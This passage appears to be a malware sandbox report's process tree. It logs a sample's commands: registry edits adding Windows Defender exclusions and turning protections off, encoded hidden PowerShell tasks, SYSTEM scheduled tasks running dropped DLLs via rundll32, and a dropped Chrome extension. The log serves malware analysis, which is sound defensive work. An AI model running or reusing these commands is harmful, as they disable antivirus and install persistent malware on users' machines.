                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2528
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1052
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1352
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:1580
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:2892
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:1996
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:2260
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:2020
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1912
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1704
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:2272
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:1508
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2240
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:1796
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:2836
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:2884
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:3020
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2760
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2512
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:1424
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2696
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "gQLnDKZqI" /SC once /ST 00:08:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2712
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "gQLnDKZqI"
                                                                                                                                            3⤵
                                                                                                                                              PID:1428
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "gQLnDKZqI"
                                                                                                                                              3⤵
                                                                                                                                                PID:2220
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1716
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2344
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1644
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1652
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 00:02:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exe\" 7d /XBTjdidfz 525403 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2756
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:788
                                                                                                                                                      • C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exe
                                                                                                                                                        C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exe 7d /XBTjdidfz 525403 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:2728
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2692
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2708
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2112
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1816
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2944
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:924
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:2700
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1136
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2216
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:948
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1760
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1788
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:280
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2532
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2280
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:1132
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1100
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2476
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2988
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1904
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1052
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1592
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1588
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1704
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:1692
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2204
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:1628
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\oCdmkB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:2012
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\XlpYdbP.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:948
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2748
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:400
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\fnRiKUr.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:588
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\lxuXctU.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2716
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXOWJiz.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2736
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\CRSZSVE.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:560
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 00:03:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll\",#1 /afdidX 525403" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:976
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2632
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1344
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll",#1 /afdidX 525403
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1748
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll",#1 /afdidX 525403
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:760
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2820
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {6D35DD82-F185-4EC1-BF7E-7CC7182F93C9} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1856
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:1056
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:864
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2880
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3036
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
